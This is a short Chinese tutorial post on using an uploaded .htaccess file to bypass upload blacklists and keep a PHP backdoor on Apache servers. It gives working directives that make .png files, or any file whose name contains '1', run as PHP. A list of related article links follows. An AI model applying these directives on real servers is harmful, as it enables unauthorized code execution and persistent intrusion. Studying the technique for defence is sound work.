.htaccess文件構成的PHP後門

原創 浅笑⁹⁹⁶ 2020-07-01 17:17

1、.htaccess文件

2、文件上傳繞過

一般.htaccess可以用來留後門和針對黑名單繞過

創建一個txt寫入(png解析爲php)

AddType application/x-httpd-php .png

另存爲.htaccess

上傳.htaccess 必須是網站根路徑

3、留後門

可以在.htaccess 加入php解析規則

類似於把文件名包含1的解析成php

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

123456.png  就會以php執行

參考文章:

https://www.cnblogs.com/hmbb/p/9689436.html4

https://www.cnblogs.com/feizianquan/p/11109390.html

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

.user.ini文件構成的PHP後門

.user.ini。它比.htaccess用的更廣,不管是nginx/apache/IIS,只要是以fastcgi運行的php都可以用這個方法。我的nginx服務器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fas

浅笑⁹⁹⁶ 2020-07-01 17:17:22

Web基礎--Bootstrap

Xzzz2020 2020-02-23 18:30:54

XML

Xzzz2020 2020-02-23 18:30:54

Web基礎--JSP

Xzzz2020 2020-02-23 18:30:54

Tomcat

Xzzz2020 2020-02-23 18:30:54

HTTP&Response

Xzzz2020 2020-02-23 18:30:54

HTTP&Request

Xzzz2020 2020-02-23 18:30:54

Web基礎--JDBC

Xzzz2020 2020-02-23 18:30:54

Web基礎--Filter&Listener

Xzzz2020 2020-02-23 18:30:54

Web基礎--Java會話技術

Xzzz2020 2020-02-23 18:30:54

.user.ini文件構成的PHP後門

.user.ini。它比.htaccess用的更廣,不管是nginx/apache/IIS,只要是以fastcgi運行的php都可以用這個方法。我的nginx服務器全部是fpm/fastcgi,我的IIS php5.3以上的全部用的fas

浅笑⁹⁹⁶ 2020-07-01 17:17:22

echarts3 標線markLine

echarts3 標線markLine實例代碼 實例代碼 markLine: { itemStyle: { normal: { lineStyle: { type: 'solid', color:'#

bellus- 2020-06-24 17:07:05

20個軟件測試工具大放送

20個軟件測試工具大放送Web應用測試工具1.JMeter2.NeoLoad3.LoadRunner4.LoadUI5.Loadster6.Load impact7.Wapt8.Qtest9.httperf10.Telerik11

bellus- 2020-06-24 17:07:05

echarts 3 動態顯示最近一天數據,以分爲單位獲取數據點

echarts 3 動態顯示最近一天數據,以分爲單位獲取數據點實例代碼 實例代碼 <!DOCTYPE html> <html style="height: 100%"> <head> <meta charset

bellus- 2020-06-24 17:07:05

get方法和post方法

get方法,會直接將數據添加到地址欄中,透明傳輸,有大小限制

Alex白给 2020-06-18 23:38:09